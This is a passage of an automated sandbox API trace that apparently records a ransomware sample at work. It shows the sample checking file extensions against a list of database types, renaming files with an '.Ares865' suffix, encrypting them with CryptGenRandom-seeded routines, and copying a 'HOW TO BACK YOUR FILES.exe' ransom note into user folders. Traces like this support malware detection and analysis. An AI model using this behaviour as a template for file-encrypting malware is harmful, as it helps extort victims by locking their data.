[0092.371] lstrlenW (lpString="mdf") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.371] lstrlenW (lpString="mdb") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.371] lstrlenW (lpString="sql") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.371] lstrlenW (lpString="sqlite") returned 6 [0092.371] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.371] lstrlenW (lpString="sqlite3") returned 7 [0092.371] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.371] lstrlenW (lpString="sqlitedb") returned 8 [0092.371] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.371] lstrlenW (lpString="xml") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.371] lstrlenW (lpString="$er") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.371] lstrlenW (lpString="4dd") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.371] lstrlenW (lpString="4dl") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.371] lstrlenW (lpString="^^^") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.371] lstrlenW (lpString="abs") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.371] lstrlenW (lpString="abx") returned 3 [0092.371] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.372] lstrlenW (lpString="accdb") returned 5 [0092.372] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.372] lstrlenW (lpString="accdc") returned 5 [0092.372] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.372] lstrlenW (lpString="accde") returned 5 [0092.372] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.372] lstrlenW (lpString="accdr") returned 5 [0092.372] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.372] lstrlenW (lpString="accdt") returned 5 [0092.372] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.372] lstrlenW (lpString="accdw") returned 5 [0092.372] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.372] lstrlenW (lpString="accft") returned 5 [0092.372] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.372] lstrlenW (lpString="adb") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.372] lstrlenW (lpString="adb") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.372] lstrlenW (lpString="ade") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.372] lstrlenW (lpString="adf") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.372] lstrlenW (lpString="adn") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.372] lstrlenW (lpString="adp") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.372] lstrlenW (lpString="alf") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.372] lstrlenW (lpString="ask") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.372] lstrlenW (lpString="btr") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.372] lstrlenW (lpString="cat") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.372] lstrlenW (lpString="cdb") returned 3 [0092.372] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.372] lstrlenW (lpString="ckp") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.373] lstrlenW (lpString="cma") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.373] lstrlenW (lpString="cpd") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.373] lstrlenW (lpString="dacpac") returned 6 [0092.373] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.373] lstrlenW (lpString="dad") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.373] lstrlenW (lpString="dadiagrams") returned 10 [0092.373] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.373] lstrlenW (lpString="daschema") returned 8 [0092.373] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.373] lstrlenW (lpString="db-journal") returned 10 [0092.373] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.373] lstrlenW (lpString="db-shm") returned 6 [0092.373] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.373] lstrlenW (lpString="db-wal") returned 6 [0092.373] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.373] lstrlenW (lpString="dbc") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.373] lstrlenW (lpString="dbs") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.373] lstrlenW (lpString="dbt") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.373] lstrlenW (lpString="dbv") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.373] lstrlenW (lpString="dbx") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.373] lstrlenW (lpString="dcb") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.373] lstrlenW (lpString="dct") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.373] lstrlenW (lpString="dcx") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.373] lstrlenW (lpString="ddl") returned 3 [0092.373] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.374] lstrlenW (lpString="dlis") returned 4 [0092.374] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.374] lstrlenW (lpString="dp1") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.374] lstrlenW (lpString="dqy") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.374] lstrlenW (lpString="dsk") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.374] lstrlenW (lpString="dsn") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.374] lstrlenW (lpString="dtsx") returned 4 [0092.374] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.374] lstrlenW (lpString="dxl") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.374] lstrlenW (lpString="eco") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.374] lstrlenW (lpString="ecx") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.374] lstrlenW (lpString="edb") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.374] lstrlenW (lpString="epim") returned 4 [0092.374] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.374] lstrlenW (lpString="fcd") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.374] lstrlenW (lpString="fdb") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0092.374] lstrlenW (lpString="fic") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.374] lstrlenW (lpString="flexolibrary") returned 12 [0092.374] lstrlenW (lpString="fm5") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.374] lstrlenW (lpString="fmp") returned 3 [0092.374] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.374] lstrlenW (lpString="fmp12") returned 5 [0092.374] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.374] lstrlenW (lpString="fmpsl") returned 5 [0092.375] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.375] lstrlenW (lpString="fol") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.375] lstrlenW (lpString="fp3") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.375] lstrlenW (lpString="fp4") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.375] lstrlenW (lpString="fp5") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.375] lstrlenW (lpString="fp7") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.375] lstrlenW (lpString="fpt") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.375] lstrlenW (lpString="frm") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.375] lstrlenW (lpString="gdb") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.375] lstrlenW (lpString="gdb") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.375] lstrlenW (lpString="grdb") returned 4 [0092.375] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.375] lstrlenW (lpString="gwi") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.375] lstrlenW (lpString="hdb") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.375] lstrlenW (lpString="his") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.375] lstrlenW (lpString="ib") returned 2 [0092.375] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.375] lstrlenW (lpString="idb") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.375] lstrlenW (lpString="ihx") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.375] lstrlenW (lpString="itdb") returned 4 [0092.375] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.375] lstrlenW (lpString="itw") returned 3 [0092.375] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.376] lstrlenW (lpString="jet") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.376] lstrlenW (lpString="jtx") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.376] lstrlenW (lpString="kdb") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.376] lstrlenW (lpString="kexi") returned 4 [0092.376] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.376] lstrlenW (lpString="kexic") returned 5 [0092.376] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.376] lstrlenW (lpString="kexis") returned 5 [0092.376] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.376] lstrlenW (lpString="lgc") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.376] lstrlenW (lpString="lwx") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.376] lstrlenW (lpString="maf") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.376] lstrlenW (lpString="maq") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.376] lstrlenW (lpString="mar") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.376] lstrlenW (lpString="marshal") returned 7 [0092.376] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.376] lstrlenW (lpString="mas") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.376] lstrlenW (lpString="mav") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.376] lstrlenW (lpString="maw") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.376] lstrlenW (lpString="mdbhtml") returned 7 [0092.376] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.376] lstrlenW (lpString="mdn") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.376] lstrlenW (lpString="mdt") returned 3 [0092.376] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.376] lstrlenW (lpString="mfd") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.377] lstrlenW (lpString="mpd") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.377] lstrlenW (lpString="mrg") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.377] lstrlenW (lpString="mud") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.377] lstrlenW (lpString="mwb") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.377] lstrlenW (lpString="myd") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.377] lstrlenW (lpString="ndf") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.377] lstrlenW (lpString="nnt") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.377] lstrlenW (lpString="nrmlib") returned 6 [0092.377] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.377] lstrlenW (lpString="ns2") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.377] lstrlenW (lpString="ns3") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.377] lstrlenW (lpString="ns4") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.377] lstrlenW (lpString="nsf") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.377] lstrlenW (lpString="nv") returned 2 [0092.377] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.377] lstrlenW (lpString="nv2") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.377] lstrlenW (lpString="nwdb") returned 4 [0092.377] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.377] lstrlenW (lpString="nyf") returned 3 [0092.377] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.378] lstrlenW (lpString="odb") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.378] lstrlenW (lpString="odb") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.378] lstrlenW (lpString="oqy") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.378] lstrlenW (lpString="ora") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.378] lstrlenW (lpString="orx") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.378] lstrlenW (lpString="owc") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.378] lstrlenW (lpString="p96") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.378] lstrlenW (lpString="p97") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.378] lstrlenW (lpString="pan") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.378] lstrlenW (lpString="pdb") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.378] lstrlenW (lpString="pdm") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.378] lstrlenW (lpString="pnz") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.378] lstrlenW (lpString="qry") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.378] lstrlenW (lpString="qvd") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.378] lstrlenW (lpString="rbf") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.378] lstrlenW (lpString="rctd") returned 4 [0092.378] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.378] lstrlenW (lpString="rod") returned 3 [0092.378] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.378] lstrlenW (lpString="rodx") returned 4 [0092.378] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.379] lstrlenW (lpString="rpd") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.379] lstrlenW (lpString="rsd") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.379] lstrlenW (lpString="sas7bdat") returned 8 [0092.379] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.379] lstrlenW (lpString="sbf") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.379] lstrlenW (lpString="scx") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.379] lstrlenW (lpString="sdb") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.379] lstrlenW (lpString="sdc") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.379] lstrlenW (lpString="sdf") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.379] lstrlenW (lpString="sis") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.379] lstrlenW (lpString="spq") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.379] lstrlenW (lpString="te") returned 2 [0092.379] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.379] lstrlenW (lpString="teacher") returned 7 [0092.379] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.379] lstrlenW (lpString="tmd") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.379] lstrlenW (lpString="tps") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.379] lstrlenW (lpString="trc") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.379] lstrlenW (lpString="trc") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.379] lstrlenW (lpString="trm") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.379] lstrlenW (lpString="udb") returned 3 [0092.379] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.379] lstrlenW (lpString="udl") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.380] lstrlenW (lpString="usr") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.380] lstrlenW (lpString="v12") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.380] lstrlenW (lpString="vis") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.380] lstrlenW (lpString="vpd") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.380] lstrlenW (lpString="vvv") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.380] lstrlenW (lpString="wdb") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.380] lstrlenW (lpString="wmdb") returned 4 [0092.380] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.380] lstrlenW (lpString="wrk") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.380] lstrlenW (lpString="xdb") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.380] lstrlenW (lpString="xld") returned 3 [0092.380] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.380] lstrlenW (lpString="xmlff") returned 5 [0092.380] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.380] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865") returned 90 [0092.380] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\administrative tools\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\administrative tools\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\administrative tools\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.381] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0092.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0092.382] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0092.383] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.383] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.383] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x15c [0092.384] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0092.384] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0092.385] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.385] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.385] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.385] CloseHandle (hObject=0x15c) returned 1 [0092.385] CloseHandle (hObject=0x118) returned 1 [0092.386] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.386] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0092.386] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.387] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0ebd60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.387] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.387] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0ebd60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0092.387] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.387] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0092.387] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories" [0092.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0092.387] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories") returned 61 [0092.387] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories" [0092.387] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.387] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.388] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 